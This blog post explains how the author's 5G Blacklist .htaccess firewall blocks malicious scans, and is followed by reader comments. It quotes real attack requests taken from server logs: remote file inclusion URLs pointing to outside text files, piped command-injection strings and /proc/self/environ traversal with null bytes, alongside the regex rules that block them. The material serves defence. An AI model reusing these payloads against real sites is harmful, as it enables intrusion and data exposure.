Building the 5G Blacklist
Protecting your website is more important than ever. There are a million ways to do it, and this is one of them. In fact, it’s what I use to protect Perishable Press and other key sites. It’s called the 5G Blacklist, and it’s something I’ve been working on for a long time. The idea is simple enough: analyze bad requests and block them using a firewall/blacklist via .htaccess
. Now in its 5th generation, the 5G Blacklist has evolved into a considerably solid method of keeping your site safe and secure. How does it work? I’m glad you asked..
What “normal” site traffic looks like
I’m no expert in traffic analysis, security, or anything else for that matter, but I love to study error logs, and love even more stopping bad guys from spamming, cracking, and exploiting my site. Gots to keep it safe and secure, and a great way to do it is understanding what’s happening behind the scenes on your server.
“Normal” site traffic involves all sorts of requests and a variety of legitimate responses. Ideally, all URL requests for your site’s resources will return a favorable 200 OK status code: user requests something from your site, and the server is able to locate and send the resource back to the user. Hopefully you’re getting plenty of 200-OK responses, but that’s not the only thing happening on your server.
Normally you’re also going to see lots of other types of status codes, depending on how good (or bad) you’ve got things configured/set-up. Here are some examples of hopefully less-common things happening on your server:
- 301 Moved Permanently – resource moved and redirected permanently
- 302 Found – resource moved and redirected temporarily
- 400 Bad Request – server does not understand request
- 401 Unauthorized – resource is protected, request not authorized
- 403 Forbidden – server refuses to return the requested resource
- 404 Not Found – server can’t find the requested resource
- 410 Gone – requested resource is no longer available
- 500 Internal Server Error – something is screwed up with the server
..and so on, with all sorts of other responses included in typically lesser volumes. Even a cursory glance through your access/error logs will reveal all sorts of this type of server activity. Normal traffic includes a wide variety of these different responses, proportionally varied depending on your setup.
Relative proportion of top server responses for Perishable Press
The above diagram isn’t scientific, but a good representation of the relative amount of different types of traffic on the server. There’s actually way more 200-OK
responses happening, but I didn’t want the graphic to be 7000px in height. Hopefully the idea is clear: you should be getting mostly 200
-level responses, and also see a reasonable amount of other responses as well.
What “bad” traffic looks like
Notice in the above diagram that there are quite a few 403
and 404
errors. This is primarily due to the way I have things set up with the 5G Blacklist and other security measures. I spend probably way too much time tracking down and resolving 404
s, which otherwise would be much more prevalent. The real key here is the relatively high volume of 403
responses. This is due to implementation of the 5G Firewall/Blacklist. Without it installed, the traffic pattern might look more like this:
How traffic might look without the 5G Blacklist
Without the 5G in place, there would be way more 404
errors and not nearly as many 403
errors. Why is this? It has to do with what the bad guys are doing when they hit your site, and how the 5G Blacklist works to block the bad stuff and keep your site safe. In general, it goes something like this:
- Bad guys use a script to scan your website for vulnerabilities
- The script requests anywhere from a few to thousands of different URLs
- Virtually all of these malicious requests are targeting non-existent resources using weird-looking, abnormal URLs
- The server can’t find any of these weird requests, so it sends back the default
404
response (most often) - As evil scripts continue to scan your site, they waste your server’s precious resources – memory, bandwidth, et al.
- The more this happens, the more
404
requests are recorded in your error & access logs
In small volumes, as seen with typical traffic patterns, the default 404 response is perfectly fine, even helpful. If something doesn’t exist, that’s the clearest way of communicating the information. But these days, websites are being targeted and scanned almost constantly, and it seems to get worse every day. The problem with doing nothing and just rolling with the default 404
responses is that it leaves the door open to further exploits should a malicious scan actually find a weakness. For example:
- Evil script scans your site and finds a hole at, say,
http://example.com/some/crazy/1337/*%*/url
- The server would normally return a
404 Not Found
response, but won’t if the request can be met (i.e., exploit opportunity) - This allows the attacker to exploit the hole found via the requested URL
And even if the server responds with a 404
, there is nothing stopping the attack script from requesting similarly structured URLs. So instead of a single 404 and done with it, malicious scans may continue freely requesting variations on the target URL, for example:
http://example.com/some/crazy/1337/*%*/url
http://example.com/another/crazy/1337/*%*/url
http://example.com/some/crazy/s0-1337/*%*()/url
http://example.com/some/crazy/1337/*%*/url?url=http://blahblah..
http://example.com/something/even/crazier/1337/*%*()/url?payload=
In my experience, it’s better to stop these requests as soon as possible, denying bad guys the chance to scan ad nauseum whatever they want. The key to doing this is understanding what’s happening on your server. Armed with that information, securing your site is a matter of analyzing server logs, matching malicious request patterns, and testing everything until your eyes glaze over and the migraine kicks in..
Or you can let someone else do it.
Building the 5G Blacklist
First of all, here’s how the 5G Blacklist works:
- Include the blacklist code in your site’s root
.htaccess
file - Apache executes the
.htaccess
directives for each URL request - The 5G Blacklist blocks requests that include matching strings of evil garbage
That’s actually how just about any blacklist/firewall works. There are other ways to protect your site against malicious requests, but handling them at the server level with .htaccess (or the httpd.conf
file) is better for performance than say using PHP to connect to the database, or using a WordPress plugin or similar. It’s also easier to install and manage: literally copy, paste, upload, and test. No configuring or editing required. When it’s time to update, just replace with the latest version. The trick is finding a current blacklist that’s been well-tested.
Evolution of the 5G
To see what it is, let’s look at where it’s been:
- Ultimate htaccess Blacklist (Compressed Version)
- 2G Blacklist: Closing the Door on Malicious Attacks
- Perishable Press 3G Blacklist
- The Perishable Press 4G Blacklist
- 5G Firewall (Beta)
Along the way, I’ve explored a wide variety of different blacklist techniques. The 5G is the culmination of all these efforts, and will eventually be replaced by the imminent 6G Blacklist/Firewall. Currently the beta release is the latest version of the blacklist, and the official/final 5G will be posted soon.
Specific examples
Now let’s look at some specific examples of what we’re blocking with the 5G. I won’t go into depth as I did explaining the building of the 4G blacklist, but will try to cover a good variety of specific examples. Reading through should give you a solid understanding of how blacklists work in general, and a good overview as to what the 5G does to help protect your site.
The simple .css(
We’ll start with one of the most common types of malicious request, those that include the “.css(
” character string. Here are some examples:
http://example.com/ip-detection-bad-seo/).css(
http://example.com/ip-detection-bad-seo/);f=e.css(
http://example.com/ip-detection-bad-seo/);this.elem.style.display=a:this.options.display;if(c.css(this.elem,
http://example.com/ip-detection-bad-seo/+b]):f===v.css(e,d):this.css(d,typeof%20f===
Notice the common pattern in these idiot requests: .css(
. Instead of trying to block the user-agent or IP address for thousands of these requests, it’s more efficient to identify the best common pattern and block any matches. Here is a simple .htaccess
directive that blocks all of these silly requests:
RedirectMatch 403 \.css\(
..but that’s some strong medicine, possibly interfering with legitimate requests. So you need to find balance between effective matching and the number of false positives. We’ll see an example of this just ahead. For now, notice how that single rule effectively blocks the endless stream of “.css(
”-type malicious requests.
The ubiquitous mosConfig_absolute_path
Another commonly seen malicious scan involves the targeting of various URLs containing the character string, “mosConfig_absolute_path
”. Most often, this is included in the query-string part of the URL, as seen in this fistful of examples:
http://example.com/include.pcchess.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/videodb.class.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://youregypt.com/id/Ckrid1.txt??
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://youregypt.com/id/Ckrid1.txt??
http://example.com/components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.fileden.com/files/2011/1/27/3068675//fx29id1.txt??
Again, you could spend a lifetime trying to block these requests using IP or user-agent, but it’s way easier and more efficient to simply block the most effective common pattern, which happens in 5G via this rule:
RewriteCond %{QUERY_STRING} (environ|localhost|mosconfig|scanner) [NC,OR]
This powerful directive also blocks several other strings, including infinite variations on mosconfig
, such as mosConfig_absolute_path
, as observed in the example URLs. This is why it’s important to carefully construct your .htaccess
rules – many malicious requests target known software, and in doing so they include legitimate variables and parameters in the scanned URLs. The 5G is fine-tuned primarily for WordPress sites, so blocking requests for the mosConfig_
pattern is no problem; however, mosConfig_
is an actual part of Joomla, Mambo, and possibly others.
Directory path to heaven
How high can you go? That’s the question some malicious scripts are asking your server about its directory structure. Here’s a rather violent sequence of recursive-directory requests that hit my site recently:
http://example.com/press/2006/01/10/stupid-htaccess-tricks/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ
http://example.com/press/2006/01/10/stupid-htaccess-tricks/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ
http://example.com/comment.php?blog=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%00
http://example.com/press/2009/12/01/stupid-wordpress-tricks/comment.php?blog=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%00
http://example.com/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000
http://example.com/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000
http://example.com/dompdf/dompdf.php?input_file=http://www.ourl.in/1???
http://example.com/press/2006/01/10/index.php?ref=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000
http://example.com/press/2006/01/10/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ%00
http://example.com/press/2006/01/10/index.php?ref=/proc/self/environ
Of course, the least common denominator for this type of request is “../
”, which as far as I know is never present in legitimate URI requests. Typically the recursive directory string is included in the query string, so we can use mod_rewrite
’s QUERY_STRING
variable to block this type of malicious request. The 5G uses the following rule to do the job:
RewriteCond %{QUERY_STRING} \.\./ [NC,OR]
And just for fun, here’s an infographic that attempts to visualize what’s happening on the server for this type of recursive directory traversal request:
A sort of virtual Inception
Don’t worry if that’s just confusing – it’s mostly hypothetical. The take-home message here is that you can block this type of evil request quite easily, with a single line of code.
Summary
Long posts deserve good summaries. Or something. Here’s a quick recap of the key points in this article:
- Websites are constantly scanned/attacked by malicious scripts
- Constant scanning and spamming wastes bandwidth and resources
- Decreased server performance negatively impacts rank, success
- It is possible to block a majority of malicious requests
- The 5G Blacklist is one way of protecting your website
- The 5G uses regular expressions to block bad requests
- These expressions match evil character strings in the URL
- Include the 5G in your site’s root
.htaccess
file - Upload to your server, test thoroughly, and done.
I hope this article is informative and useful. If you have questions or suggestions please share them in the comments. Thanks :)
20 responses to “Building the 5G Blacklist”
The blacklist is great, personally I use phpids and mod_secure for bad bots/exploits, etc.
Your site does a great job educating people, many of which don’t really know how this stuff works, and the tools targeting WordPress are growing every day.
For example just in the last hour here is what was blocked on one of my sites in terms of bad requests, you can see some are lame bots bot others are specific to WordPress.
http://pastebin.com/N9K4mBeZ
Just wanted to let you know that your Blacklist is working well with Drupal 7 in a multi-site configuration and many modules to include Boost and FileCache installed. I just removed:
RewriteEngine On
RewriteBase /
Since that is already declared by Drupal and for the boost module.
Awesome – Thanks for reporting that :)
Your blacklists are very appreciated by the community!! Keep up the great work!
Anyone convert these rewrite rules to IIS 7.5 URL Redirects? I’m going to try.
Looks like google page speed returns a 403 when useing the 5G
Blocking legit services isn’t unusual in these types of anti-spam services Conor. Bad Behaviour is the same: http://bad-behavior.ioerror.us/
It’s an issue you have to be aware of as you toss up the pros and cons for such a script.